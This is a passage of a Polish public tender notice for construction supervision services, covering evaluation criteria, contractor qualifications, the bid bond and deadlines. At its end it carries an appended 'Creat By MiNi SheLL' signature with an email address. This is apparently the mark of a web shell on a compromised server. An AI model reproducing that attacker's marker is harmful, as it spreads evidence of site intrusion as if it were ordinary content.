waloryzacji ceny umowy;<br/>25) weryfikacja dokumentów złożonych przez Wykonawcę robót budowlanych dotyczących <br/>ewentualnego wcześniejszego przerwania robót przed zakończeniem realizacji przedmiotu <br/>umowy.<br/>b) Wykonawca zobowiązany będzie również w ramach zaproponowanego wynagrodzenia w <br/>okresie gwarancji do:<br/>1) uczestnictwa w przeglądach gwarancyjnych i rozwiązywania sporów ,<br/>2) uczestnictwa w odbiorze usuniętych usterek, wad ujawnionych w przeglądach gwarancyjnych,<br/>3) sporządzania dokumentacji z przeglądów gwarancyjnych obejmujących: wykaz usterek i wad, <br/>wskazania przyczyn powstania usterek i podanie zaleceń odnośnie ich usunięcia, sporządzanie <br/>kosztorysu dot. powstałych usterek i wad;<br/>4) nadzoru nad robotami wykonywanymi przez wykonawcę w ramach usunięcia stwierdzonych <br/>wad i usterek,<br/>5) udziału w pogwarancyjnym odbiorze robót,<br/>6) w okresie gwarancji udzielonej przez wykonawcę robót, usługodawca musi być dostępny na <br/>żądanie zamawiającego w celu nadzorowania wykonywanych robót i odbioru,<br/>7) inne czynności niezbędne do prawidłowego pełnienia nadzoru inwestorskiego oraz koniecznych <br/>do wykonania robót budowlanych dla przedmiotowej inwestycji.<br/> Inspektor Nadzoru Inwestorskiego uczestniczy we wszelkich sporach ( w tym również przed <br/>sadem powszechnym ) z Wykonawcą reprezentując Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zadanie 2<br/>1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami <br/>oceny ofert:<br/> Cena (C) – waga kryterium 60 %;<br/>Doświadczenie zawodowe osoby wyznaczonej do realizacji zamówienia w specjalności <br/>konstrukcyjno - budowlanej bez ograniczeń (D) – waga kryterium 40%<br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/> C = cena najniższa brutto*/ cena oferty ocenianej brutto x 60 pkt<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>c) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana <br/>przez Wykonawcę w Formularzu Ofertowym.<br/>d) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w <br/>związku z realizacją przedmiotu zamówienia.<br/>D=Doświadczenie zawodowe osoby wyznaczonej do realizacji zamówienia w <br/>specjalności konstrukcyjno - budowlanej bez ograniczeń<br/>Sposób przyznawania punktów za doświadczenie zawodowe osoby wyznaczonej do realizacji <br/>zamówienia, tj. inspektora specjalności konstrukcyjno-budowlanej bez ograniczeń, <br/>posiadającego odpowiednie uprawnienia, biorąc pod uwagę ilość zrealizowanych prawidłowo <br/>zamówień, polegających na pełnieniu nadzoru inwestorskiego zadań polegających na budowie, <br/>przebudowie, rozbudowie obiektów kubaturowych użyteczności publicznej lub budynków <br/>mieszkalnych wielorodzinnych w rozumieniu §3 pkt. 4) i 6) Rozporządzenia Ministra <br/>Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych, jakim powinny <br/>odpowiadać budynki i ich usytuowanie (t.j. Dz. U. z 2022r. poz. 1225 z późn. zm.), o wartości <br/>wykonanych prac nie mniejszej niż 500 000,00zł brutto, w okresie ostatnich 3 lat:<br/>1 zadanie - 0 pkt <br/>2 zadania - 10 pkt <br/>3 zadania - 20 pkt<br/>4 zadania - 30 pkt<br/>5 zadań i więcej - 40 pkt<br/>W przypadku, gdy Wykonawca w formularzu ofertowym oświadczy o niewykonaniu żadnego <br/>zadania, jego oferta zostanie odrzucona jako niezgodna z treścią SWZ.<br/>3. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z <br/>dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących <br/>treści złożonej oferty, w tym zaoferowanej ceny.<br/>7. Całkowita liczba punktów (L), jaką może otrzymać dana oferta, zostanie obliczona wg <br/>poniższego wzoru: L = C + D<br/>8. Zamawiający udzieli zamówienia Wykonawcy, który uzyska największą liczbę punktów (L)<br/>Wykonawca powinien wskazać w Załączniku nr 1 do SWZ tą samą osobę , która zostanie <br/>wskazana Załączniku nr 8b do SWZ, stanowiącym jednocześnie załącznik do umowy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe osoby wyznaczonej do realizacji zamówienia w specjalności konstrukcyjno - budowlanej bez ograniczeń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na <br/>zasadach określonych w Rozdziale VIII i IX SWZ, oraz spełniają określone przez Zamawiającego <br/>warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile <br/>wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Zadanie 1<br/>a) w zakresie warunku dotyczącego zdolności zawodowej (doświadczenie zawodowe), <br/>Zamawiający wymaga, aby Wykonawca wykazał że w okresie ostatnich 5 lat przed <br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w <br/>tym okresie, wykonali minimum jedną robotę budowlaną polegającą na budowie, <br/>przebudowie, rozbudowie obiektów kubaturowych użyteczności publicznej lub budynków <br/>mieszkalnych wielorodzinnych w rozumieniu §3 pkt. 4) i 6) Rozporządzenia Ministra <br/>Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych, jakim powinny <br/>odpowiadać budynki i ich usytuowanie (t.j. Dz. U. z 2022r. poz. 1225) o wartości nie <br/>mniejszej niż: 500 000, 00 zł brutto.<br/>b) w zakresie warunku dotyczącego zdolności zawodowej (potencjał kadrowy), <br/>Zamawiający wymaga, aby wykonawca dysponował minimum 1 osobą na każde z niżej <br/>wymienionych stanowisk:<br/>kierownik budowy (pełniący jednocześnie rolę kierownika robót) – minimalne<br/>wymagania:<br/>▪ posiadający uprawnienia do kierowania robotami budowlanymi w zakresie zgodnym z <br/>przedmiotem zamówienia w specjalności konstrukcyjno-budowlanej,<br/>▪ osobą posiadającą co najmniej 4 letnie doświadczenie zawodowe, prawo do pełnienia <br/>samodzielnych funkcji technicznych w budownictwie bez ograniczeń lub odpowiadające <br/>im równoważne uprawnienia w tej specjalności, które zostały wydane na podstawie <br/>wcześniej obowiązujących przepisów, zgodnie z wymogami ustawy Prawo budowlane <br/>oraz ważne zaświadczenie o przynależności do właściwej izby samorządu zawodowego; <br/>kierownik robót branży sanitarnej – minimalne wymagania:<br/>▪ posiadający uprawnienia do wykonywania samodzielnych funkcji technicznych w <br/>budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń <br/>wodociągowych, kanalizacyjnych i cieplnych,<br/>▪ prawo do pełnienia samodzielnych funkcji technicznych w budownictwie bez ograniczeń <br/>lub odpowiadające im równoważne uprawnienia w tej specjalności, które zostały wydane <br/>na podstawie wcześniej obowiązujących przepisów, zgodnie z wymogami ustawy Prawo <br/>budowlane oraz ważne zaświadczenie o przynależności do właściwej izby samorządu <br/>zawodowego;<br/>kierownik robót branży elektrycznej – minimalne wymagania:<br/>▪ posiadający uprawnienia do wykonywania samodzielnych funkcji technicznych w <br/>budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń <br/>elektrycznych i elektroenergetycznych,<br/>▪ prawo do pełnienia samodzielnych funkcji technicznych w budownictwie bez ograniczeń <br/>lub odpowiadające im równoważne uprawnienia w tej specjalności, które zostały wydane <br/>na podstawie wcześniej obowiązujących przepisów, zgodnie z wymogami ustawy Prawo <br/>budowlane oraz ważne zaświadczenie o przynależności do właściwej izby samorządu <br/>zawodowego;<br/>Zadanie 2<br/>a)Zamawiający wymaga, aby Wykonawca wykazał, że w okresie ostatnich trzech lat przed <br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w <br/>tym okresie wykonał należycie minimum jedną usługę polegająca na nadzorze <br/>inwestorskim robót budowlanych, których wartość przekroczyła 500 000,00zł brutto, <br/>polegających na budowie, przebudowie, rozbudowie obiektów kubaturowych <br/>użyteczności publicznej lub budynków mieszkalnych wielorodzinnych w rozumieniu §3 <br/>pkt. 4) i 6) Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie <br/>warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (t.j. Dz. <br/>U. z 2022 r. poz. 1225 z późn. zm.) o wartości prac budowlanych <br/>b)Zamawiający wymaga, aby Wykonawca wykazał, że będzie dysponował co najmniej 1 <br/>osobą o odpowiednich kwalifikacjach zawodowych, doświadczeniu i wykształceniu <br/>niezbędnym do wykonania zamówienia to jest: <br/>- min. 1 osobą mogącą wykonywać samodzielne funkcje techniczne w budownictwie, <br/>posiadającą odpowiednie uprawnienia budowlane do nadzorowania robót budowlanych <br/>w specjalności konstrukcyjno - budowlanej bez ograniczeń oraz posiadającą co <br/>najmniej 4 letnie doświadczenie zawodowe, prawo do pełnienia samodzielnych funkcji <br/>technicznych w budownictwie bez ograniczeń lub odpowiadające im równoważne <br/>uprawnienia w tej specjalności, które zostały wydane na podstawie wcześniej <br/>obowiązujących przepisów, zgodnie z wymogami ustawy Prawo budowlane oraz ważne <br/>zaświadczenie o przynależności do właściwej izby samorządu zawodowego; <br/>- min. 1 osobą mogącą wykonywać samodzielne funkcje techniczne w budownictwie, <br/>posiadającą odpowiednie uprawnienia budowlane do nadzorowania robót w <br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, <br/>wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz prawo do <br/>pełnienia samodzielnych funkcji technicznych w budownictwie bez ograniczeń lub <br/>odpowiadające im równoważne uprawnienia w tej specjalności, które zostały wydane na <br/>podstawie wcześniej obowiązujących przepisów, zgodnie z wymogami ustawy Prawo <br/>budowlane oraz ważne zaświadczenie o przynależności do właściwej izby samorządu <br/>zawodowego;<br/>- min. 1 osobą mogącą wykonywać samodzielne funkcje techniczne w budownictwie, <br/>posiadającą odpowiednie uprawnienia budowlane do nadzorowania robót w <br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i <br/>elektroenergetycznych oraz prawo do pełnienia samodzielnych funkcji technicznych w <br/>budownictwie bez ograniczeń lub odpowiadające im równoważne uprawnienia w tej <br/>specjalności, które zostały wydane na podstawie wcześniej obowiązujących przepisów, <br/>zgodnie z wymogami ustawy Prawo budowlane oraz ważne zaświadczenie o <br/>przynależności do właściwej izby samorządu zawodowego;<br/>W/w wymienione osoby winny posiadać uprawnienia budowlane zgodnie z ustawą z dnia 07 <br/>lipca l 994r. Prawo Budowlane (Dz.U. z 2023 r. poz. 682 ze zm.) oraz rozporządzeniem <br/>Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r w sprawie samodzielnych funkcji <br/>technicznych w budownictwie (Dz. U z 2019r. poz. 831) lub odpowiadające im ważne <br/>uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących <br/>przepisów.<br/>Zgodnie z art. 12 a ustawy Prawo budowlane samodzielne funkcje techniczne w <br/>budownictwie, określone w art. 12 ust.I ustawy mogą również wykonywać osoby, których <br/>odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach <br/>odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 18 marca 2008 r. o <br/>zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii <br/>Europejskiej (tekst jednolity Dz. U. 2008. 63.394 ze zm.).<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej - dopuszcza łączne <br/>spełnianie warunku przez Wykonawców.<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada <br/>wymaganych zdolności, jeżeli posiada przez wykonawcę sprzecznych interesów, w <br/>szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne <br/>przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację <br/>zamówienia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz podmiotowych środków dowodowych, oświadczeń lub innych dokumentów potwierdzających brak podstaw wykluczenia oraz<br/>spełnienia warunków udziału w postępowaniu znajduje się w rozdziale X SWZ</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający nie żąda wniesienia wadium na Zadanie 2 .<br/>2. Zamawiający żąda wniesienia wadium na Zadanie 1.<br/>3. Wykonawca Zadania 1 zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: <br/>5 000,00 zł (słownie: pięć tysięcy złotych 00/100);.<br/>4. Wadium wnosi się przed upływem terminu składania ofert. Wadium musi obejmować pełen okres <br/>związania ofertą.<br/>5. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)pieniądzu;<br/>2)gwarancjach bankowych;<br/>3)gwarancjach ubezpieczeniowych;<br/>4)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia <br/>9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. <br/>poz. 299).<br/>6. Wadium w formie pieniądza należy wnieść przelewem na konto 65 1020 4753 0000 0202 0038 <br/>7357 PKO BP S.A z dopiskiem „Wadium w post. RRG.271.10.2024 Zadanie 1” UWAGA: Za <br/>Strona 21 z 27<br/>termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku <br/>Zamawiającego.<br/>7. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub <br/>poręczenia w postaci elektronicznej i musi obejmować cały okres związania ofertą.<br/>8. W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej w ich treści <br/>winien znajdować się zapis o tym, że jest ona nieodwołalna, bezwarunkowa i płatna na pierwsze <br/>żądanie Zamawiającego. Zapłata musi nastąpić niezależnie od ewentualnych zastrzeżeń <br/>Wykonawcy. Zamawiającemu powinno przysługiwać prawo dochodzenia należności <br/>zabezpieczonych gwarancją bezpośrednio od wystawcy gwarancji. Niedopuszczalne są zapisy <br/>uzależniające zapłatę przez gwaranta sumy gwarancyjnej od wcześniejszego żądania zapłaty <br/>należności od Wykonawcy.<br/>9. Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie utrzyma <br/>wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w <br/>przypadku, o którym mowa w art. 98 ust. 2 pkt 3 Pzp zostanie odrzucona na podstawie art. 226 <br/>ust. 1 pkt 14 ustawy Pzp.<br/>10. Okoliczności i zasady zwrotu wadium określa art. 98 ust. 1 - 5 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy <br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i <br/>zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do <br/>oferty. <br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o <br/>których mowa w Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te <br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim <br/>każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, <br/>z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa <br/>każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego <br/>na warunkach określonych we Wzorze Umowy, stanowiącym Załącznik nr 7a do <br/>SWZ dla Zadania nr 1 i Załącznik nr 7b do SWZ dla Zadania nr 2.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem <br/>zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej <br/>oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym we Wzorze Umowy, <br/>stanowiącym Załącznik nr 7a i Załącznik nr 7b do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy <br/>pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-17 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/ugg</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-17 08:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-06-15</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający korzysta z uprawnienia, o jakim stanowi art. 288 ust. 1 ustawy Pzp i zastrzega sobie prawo do zaproszenia do negocjacji maksymalnie trzech Wykonawców, których oferty przedstawiają najkorzystniejszy stosunek jakości do ceny, obliczony na podstawie kryteriów oceny ofert, określonych w<br/>rozdziale XIX. <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Z postępowania o udzielenie zamówienia publicznego wyklucza się Wykonawcę, w stosunku do którego zachodzi<br/>którakolwiek z okoliczności wskazanych w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (przesłanka<br/>obligatoryjna).<br/>2. Od wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza w Zadaniu 2 nie będzie wymagane wniesienie<br/>zabezpieczenia należytego wykonania umowy.<br/>3. Wyklucza się możliwość pełnienia na tej samej budowie funkcji kierownika budowy i inspektora nadzoru przez jedna<br/>osobę.<br/>4.Zamawiający nie przewiduje fakultatywnych podstaw wykluczenia wykonawcy w zakresie realizacji Zadania 2

Creat By MiNi SheLL
Email: jattceo@gmail.com